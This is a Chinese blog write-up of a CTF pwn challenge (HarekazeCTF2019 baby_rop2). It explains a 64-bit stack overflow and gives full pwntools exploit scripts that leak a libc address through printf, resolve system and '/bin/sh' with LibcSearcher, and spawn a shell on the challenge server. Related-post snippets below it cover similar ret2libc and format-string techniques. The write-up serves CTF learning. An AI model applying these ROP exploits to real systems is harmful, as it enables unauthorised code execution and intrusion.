关于printf函数泄露地址的libc题型

已于 2023-06-09 22:24:18 修改
阅读量963 收藏 7
点赞数 3
分类专栏: libc pwn 文章标签: 网络安全
于 2023-05-25 22:08:20 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/IT_huanhuan/article/details/130876252
版权

题目来源:[HarekazeCTF2019]baby_rop2

拿到题目,运行一下,在检查一下它的架构和保护。

在这里插入图片描述

很明显,只有一次输入机会,并且是64位的架构,堆栈不可执行。

接下来,我们放入IDA查看一下源码。

在这里插入图片描述

可以看到很明显的栈溢出漏洞,read读入0X100字节大小的数据,但是该缓冲区只有0x28大小。所以可以在这进行栈溢出漏洞的操作。但是给我们的信息就这么多,我们找一下字符串吧

在这里插入图片描述

看来是没有/bin/sh 看来是我们自己找方法让他执行bin的调用吧。

接下来进行GDB调试吧。

在执行到read时,我们输入aaaaaaaaa,可以验证IDA里面的溢出字节是否正确,很明显IDA时正确的0x70 - 0x50 的字节,再加上8字节的覆盖到返回地址。

在这里插入图片描述

因为这道题,我们首先应该做的是泄露地址,泄露那个地址,我觉得可以是printf或者是read的地址都行,接下来我们就尝试一下吧。

我们在构建ROP链时,应该想我们需要怎样去泄露地址,才能达到我们所希望的程序执行,因为是64位的,我们需要一些 pop|ret 去放我们的参数,printf在执行打印格式化字符串时,有产生一个参数,然后我们还需要一个寄存器,来存放我们got表里所要的真实地址。

所以第一份payload用于泄露地址:

b'a'*28 + p64(pop_rdi) + p64(f_srt) + p64(pop_rsi_r15) + p64(printf_got) + p64(0) + p64(prinf_plt) + p64(main_addr)

解释一下,这里P64(0)的意思就是给R15寄存器填充对应的参数,pop_r15对应参数0,由于我们不用r15,随便设置一下它,我是设置成了0。 最后加个main函数,是我们返回到main函数,让程序走一遍,以便我们可以写入接下来的payload去控制程序流。

这下来,我们就去需要这些我们需要用到的值,由于ELF()自带可以寻找got plt symbols 所以这些我们就不用去寻找了。双击IDA,格式化字符串所在的位置,找到了他所对应的地址。

在这里插入图片描述

然后再去寻找gadget。
在这里插入图片描述

所以我们就找到,我们所用的gadget片段的地址了。

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
elf = ELF('./babyrop2')
#p = process('./babyrop2')
p = remote('node4.buuoj.cn',26128)

pop_rdi_ret = 0x0400733
pop_rsi_r15 = 0x0400731
f_str = 0x0400770
#read_got = elf.got['read']
printf_plt = elf.plt['printf']
printf_got = elf.got['printf']
main_addr = elf.symbols['main']
payload = cyclic(0x28) + p64(pop_rdi_ret) + p64(f_str) + p64(pop_rsi_r15) + p64(printf_got) + p64(0) + p64(printf_plt) + p64(main_addr)
p.recvuntil('name?')
p.sendline(payload)

#got_addr = u64(p.recv(6).ljust(8, b'\x00')) 这里不能这样执行,因为会得到前6个字节,而这前6个字节大概率不是我们想要的地址。
printf_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))#7f是地址的开头,因为参数是逆序入栈的。所以要接受到7f之前的前6个
print(hex(printf_addr))  #当我执行这一串时,会报错,不知道为什么,泄露不了printf函数的真实地址。

泄露printf函数无望,那么我们只能去泄露read函数的真实地址了。

from pwn import *
from LibcSearcher import *

context.log_level = 'debug'
elf = ELF('./babyrop2')
#p = process('./babyrop2')
p = remote('node4.buuoj.cn',26868)

pop_rdi_ret = 0x0400733
pop_rsi_r15 = 0x0400731
f_str = 0x0400770
#ret = 0x04004d1
read_got = elf.got['read']
printf_plt = elf.plt['printf']
read_got = elf.got['read']
main_addr = elf.symbols['main']
payload = cyclic(0x28) + p64(pop_rdi_ret) + p64(f_str) + p64(pop_rsi_r15) + p64(read_got) + p64(0) + p64(printf_plt) + p64(main_addr)
#p.recvuntil('name?')
p.sendline(payload)

#read_addr = u64(p.recv(6).ljust(8, b'\x00'))
read_addr = u64(p.recvuntil('\x7f')[-6:].ljust(8, b'\x00'))
print(hex(read_addr))

在这里插入图片描述

得到read的真实地址,接下来,就计算libc的基地址了。

libc = LibcSearcher('read', read_addr)
base = read_addr - libc.dump('read')
sys_addr = base + libc.dump('system')
str_bin_sh = base + libc.dump('str_bin_sh')
#base = read_addr - offect_base
#sys_addr = base + offect_sys
#str_bin_sh = base + offect_str

#p.recvuntil('name?')
payload1 = cyclic(0x28) + p64(pop_rdi_ret) + p64(str_bin_sh) + p64(sys_addr)

p.sendline(payload1)
p.interactive()

1-4代码块是使用python的一个库,去计算libc。

5-7则是使用网站libc_searcher,寻偏移计算公式。(但是很不幸,这里面并没有所需的libc
在这里插入图片描述

打通了,ls一下;

在这里插入图片描述

好像并没有flag,然后`find -name “flag”

在这里插入图片描述

在C语言的glibc库中,我们可以使用printf函数来进行输操作
CyberBladeX的博客
09-21 178
在C语言中,我们可以使用open函数打开串口设备文件,并通过write函数将数据写入该文件。因此,我们需要修改printf函数的输流,使其将数据写入串口设备文件而不是标准输。接下来,我们使用dup2函数将标准输的文件描述符(STDOUT_FILENO)重定向到串口设备文件的文件描述符(serial_fd)。通过以上的代码和说明,我们可以实现将printf函数的输重定向到串口设备文件,以便进行调试和与外部设备通信。最后,我们调用printf函数一条消息到串口设备,这条消息将会通过串口发送去。
探究printf
zhangxinjieli3的专栏
04-15 379
printf的探究始于几个问题 1、 short a, b; printf(“a=%d b=%d”, a, b); %d是用来打印有符号整型int类型,那它这样打印会不会有问题,比如寻址越界,但是发现其实都能够打印正常,所以应该不会有寻址越界问题。 2、printf的实现原理究竟是怎样的,它是如何实现可变参数的。 现在我们仍然采用汇编语言以及阅读printf源码来解决疑问。 type
通过给的libc泄露函数地址
zszcr的博客
03-22 5573
libc中的函数相对于libc的基地址的偏移都是确定的,如果有一道题给你了libc的文件,就可以通过libc文件泄露system函数和binsh的地址,然后再构造payload。一般通过write()函数泄露 ,通过ELF获得write函数在got表和plt表中的地址同时获得程序start地址 构造payload payload 一般是填充字符(栈的大小)+ ‘aaaa’(覆盖EBP)+  p3...
泄露libc
inquisiter
01-12 1632
pintf泄露libc 虽然存在格式化字符串漏洞,并且GOT表可写,但是程序使用的是printf_chk函数。会检测形如"%n"和"%12$p"这种利用方式。 考虑到main函数libc_start_main调用,因此栈上的返回地址是一个libc中的地址,利用格式化字符串漏洞能泄露libc的基址。 “%p::%p::%p::%p::%p::%p::%p::%p”。第8个%p就能打印l
[BUUCFT]PWN——pwn2_sctf_2016(整数溢+泄露libc
mcmuyanga的博客
10-05 4646
pwn2_sctf_2016[整数溢+泄露libc] 题目附件 步骤: 例行检查,32位,开启了nx保护 试运行一下程序,看看大概的执行情况 32位ida载入,shift+f12检索程序里的字符串,没有看到现成的system和‘/bin/sh’,加上开启了NX保护,估计是泄露libc类型的题目 从main函数开始看程序,main函数就调用了一个vuln函数 注意第7行的输入函数不是get,是程序自定义的函数get_n, 接受a2个长度的字符串并放到vuln函数的缓冲区内部,但是a2传入的值类型是un
libc库的printf实现代码
transistor0的专栏
11-22 689
static char log_buf[1024];static char store[20];int pos = 0;char *itoa(int num, char *str, int radix) ;char *itoa(int num, char *str, int radix) {    char string[] = "0123456789abcdefghijklmnopqrstuvw
【Pwn】printf漏洞
weixin_52553215的博客
03-10 1283
参考:https://bbs.pediy.com/thread-250858.htm Format String 介绍 1 printf("Team Name: %s\tPoints: %d\n", "Whitzard", 999); 在上面这行语句中, "Team Name: %s\tPoints: %d\n"为格式化字符串(即printf第一个参数),"Whitzard"、999分别为第二个和第三个参数。在格式化字符串解析时,格式化字符串中的 "%s" 对应
linux sort 0x7f,【真题解析】浅析CTF中PWN题型的解题思路
weixin_42500631的博客
05-16 900
原标题:【真题解析】浅析CTF中PWN题型的解题思路前言写一下西湖论剑里的三道pwn题,主要讲一下第二道,因为后面我才发现自己解第二道好像是非预期解。。讲一下自己的解题思路吧。1PWN之一——Story常规基础pwn,格式化字符串+ROP。漏洞:格式化字符串:printf(&s);栈溢:if( v1 < 0)v1 = -v1;if( v1 > 128)v1 = 1024LL;...
格式化字符串漏洞详解(附BUUCTF习题)
a12sj_的博客
02-12 1109
格式化字符串漏洞(Format String Vulnerability)是由于程序使用用户可控的输入作为格式化字符串参数(如 、 等函数)时未正确过滤导致的漏洞。攻击者可通过构造特殊格式字符串实现以下操作:内存泄露:读取栈或堆中的敏感数据(如密码、密钥)。内存覆盖:向任意地址写入数据(如劫持控制流、覆盖函数指针)。程序崩溃:通过非法内存访问导致拒绝服务(DoS)。关键机制:信息泄露(Memory Leak)目标:读取栈或堆中的敏感数据(如 或 地址)。示例: → 用户输入 泄露栈内容。覆盖关键变量目
【pwn】学pwn日记(栈学习)(随缘更新)
woodwhale的博客
08-04 5554
【pwn】学pwn日记(持续更新) 前言 从8.2开始系统性学习pwn,在此之前,学习了部分汇编指令以及32位c语言程序的堆栈图及函数调用。 文章中的部分图片来自于教学视频 学习视频链接:XMCVE 2020 CTF Pwn入门课程、【星盟安全】PWN系列教程(持续更新) 学习文章链接: CTF Wiki elf文件 未初始化的全局变量glb,编译来在内存中bss中 初始化的全局变量str(没有被修改过),编译来在内存中data 而hello world在text段中 main和sum
canary入门小总结(遇到的新题型:jarvis oj pwn smashes解题以及一些基础了解)
ins_Digger的博客
11-01 961
今天的我还是在做pwn题,没怎么看书。本来今天打算做picoCTF的pwn题的,无奈怎么也连不上它的shell。(难受)然后去Jarvis OJ 做pwn题去了。 题目挑着做,总共只做了两题。第一题是简单的栈溢。第二题就很有趣了,是我没遇过的题 看网上大神们写的writeup叫做canary。 做完题目后稍微去搜索了一下关于这种题目的资料。(这里吐槽一下有些写writeup的博主,本来就是新手题...
BugkuCTF-PWN题pwn7-repeater详细讲解多解法
am_03的博客
08-31 4477
知识点 解题流程 方法一 查看文件类型: 32位文件 查看保护机制 只开启了NX 32位IDA打开 伪码: 0x70=112 0x64=100 发现该题目为典型的格式字符串漏洞。 解题思路 此题的大概思路如下: 1、找到libc_start_main在栈内的偏移,使用%p暴露该地址 2、利用LibcSearcher猜测使用的libc,算libc基址 3、计算libc的system地址 4、把prinf的got表改为system地址 5、执行system(’/bin/sh’) 具体调试 执行gd
泄漏libc地址
yjh_fnu_ltn的博客
06-01 1669
这里可以利用vulnerable_function函数进行栈溢,利用write函数泄漏write函数地址,从而拿到libc,使用write函数泄漏write函数地址时(puts函数同理),即使程序在前面。利用write函数的got表和plt表,溢得到write函数地址,在计算得到libc_base基地址。先看汇编下调用write函数时参数的传递:(以32位为例),泄漏 fun_name的got地址和。
CTF(Pwn) Rop + ret2libc 题型 常规解法思路 (初级)
半岛铁盒的博客
03-22 1262
引子 随着 NX 保护的开启,以往直接向栈或者堆上直接注入代码的方式难以继续发挥效果。攻击者们也提来相应的方法来绕过保护,目前主要的是 ROP(Return Oriented Programming),其主要思想是在栈缓冲区溢的基础上,利用程序中已有的小片段 (gadgets) 来改变某些寄存器或者变量的值,从而控制程序的执行流程。所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。 之所以称之为 ROP,是因为核心在于利用了指令
printf 内部原理和实现 (你想知道的C语言 1.2)
编程语言开发、框架原理、编程思想、最佳实践技巧经验分享
06-29 5456
printf
[PWN] 泄露libc HarekazeCTF_2019_baby_rop2
LDX的博客
11-28 769
pwn 64位 泄露libc版本
pwn 暑假复习三 libc泄露
SsMing的博客
07-15 7459
ctfwiki例一:ret2libc2拿到程序checksec查看:没什么问题源码int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [sp+1Ch] [bp-64h]@1 setvbuf(stdout, 0, 2, 0); setvbuf(stdin, 0, 1, 0); p...
[PWN] BUUCTF pwn2_sctf_2016(整数溢+泄露libc)
空城惜梦的博客
06-05 932
[PWN] BUUCTF pwn2_sctf_2016解题分析漏洞利用payload分析payload1payload2 解题分析 按照惯例先checksec,开了nx保护和部分RELRO 接着运行文件,观察程序的运行逻辑,读入一个长度len然后把输入的字符,再打印输入的Len个字符 32位IDA打开文件,main函数调用了vuln() 发现对输入的长度len做了限制,len不能大于32 当len>32后,程序将结束,这就导致无法直接溢 进入get_n函数,发现get_n会接收a2个长度
printf 重新实现put_再识printf
weixin_39648297的博客
11-25 301
前言printf函数,对于C程序员来说,熟悉得不能再熟悉,基础得不能再基础了。不管是什么版本的C语言教材,按照惯例,第一个示例必然是用printf打印一串hello world。我当时学C语言的时候,也只是依葫芦画瓢把示例代码输入电脑,按步骤编译、运行,屏幕上果然现了hello world。当时也没有去思考程序是如何将hello world显示到屏幕上的,按当时的水平,也想不个所以然。前两天偶...
程序中没有直接可以用的system函数所以需要我们自己构造ROP链通过gets函数泄露libc基址构造payload来泄露libc
最新发布
04-09
### 构造 ROP 链使用 `gets` 函数泄露 libc 基址的方法 #### 背景介绍 在现代操作系统中,为了防止缓冲区溢攻击,引入了许多安全机制,例如地址空间布局随机化(ASLR)、堆栈保护器(Stack Canaries)以及非执行内存页(NX Bit)。然而,在某些情况下,如果程序存在未受保护的函数调用(如 `gets`),则可以通过返回导向编程(Return-Oriented Programming, ROP)技术绕过这些防护措施。 以下是通过构造 ROP 链并利用 `gets` 函数泄露 libc 基址的一种方法: --- #### 步骤解析 1. **禁用 ASLR 和其他保护机制** 如果目标环境启用了 ASLR,则需要找到一种方式绕过它。这可能涉及多次运行程序以收集足够的信息或者依赖于部分泄漏的信息。对于本例中的编译选项 `-no-pie` 已经关闭了位置独立可执行文件的支持[^2],因此可以简化我们的工作流程。 2. **寻找合适的 Gadget** 在构建 ROP 链之前,需先分析二进制文件以提取可用的小工具(gadgets)。这些 gadgets 是存在于程序及其加载库中的短代码片段,它们将以特定顺序组合起来实现所需功能。 可以使用工具如 `ropper` 或者手动查找 gadget 来完成此操作: ```bash ropper --file ./vulnerable_program ``` 3. **准备输入数据结构** 输入的数据应设计成使得当控制流被劫持到我们指定的位置时,寄存器状态正好满足后续操作需求。具体来说,我们需要填充堆栈直到覆盖返回地址,并放置一系列精心挑选好的 gadgets 地址作为新的返回路径的一部分。 4. **调用 puts@plt 输地址** 利用已知偏移量计算得到实际加载至内存中的动态链接库起始点。假设我们知道标准 C 库内部某个固定符号相对于整个镜像头部的确切距离,则只需简单相减即可得 base pointer 的估计值。 下面是一个简单的 Python 脚本来生成 payload 并发送给服务器端交互式会话: ```python import struct # Offset to reach the saved EIP on stack after overflow. OFFSET = 0xXX # Address of 'puts' function inside PLT section (Program Linkage Table). PUTS_PLT = 0xYYYYYY # Pointer pointing towards string literal "/bin/sh\x00". BIN_SH_PTR = 0xZZZZZ payload = b"A" * OFFSET # Filler bytes up until overwrite point. payload += struct.pack("<I", PUTS_PLT) # Overwrite RET with address of puts(). payload += struct.pack("<I", BIN_SH_PTR) # Argument passed into puts(). print(payload.decode()) ``` 5. **捕获输结果推导 Libc Base** 当上述脚本成功触发后,远程服务将会打印对应字符串的实际映射地址。由于大多数发行版 Linux 上安装的标准版本之间差异较小,所以可以根据公开文档查询相应字段间的关系从而还原整体框架图谱。 6. **跳转至 system("/bin/sh") 执行命令外壳** 最终一步就是安排好所有必要的组件之后再次调整上下文切换过去真正启动 shell 进程结束任务。 --- ### 注意事项 尽管演示过程看似简洁明了,但在真实世界场景下往往面临更多复杂因素考量,比如不同架构下的字节序问题、多线程环境下竞争条件的影响等等都需要额外注意处理妥善才行。 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Y_huanhuan

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值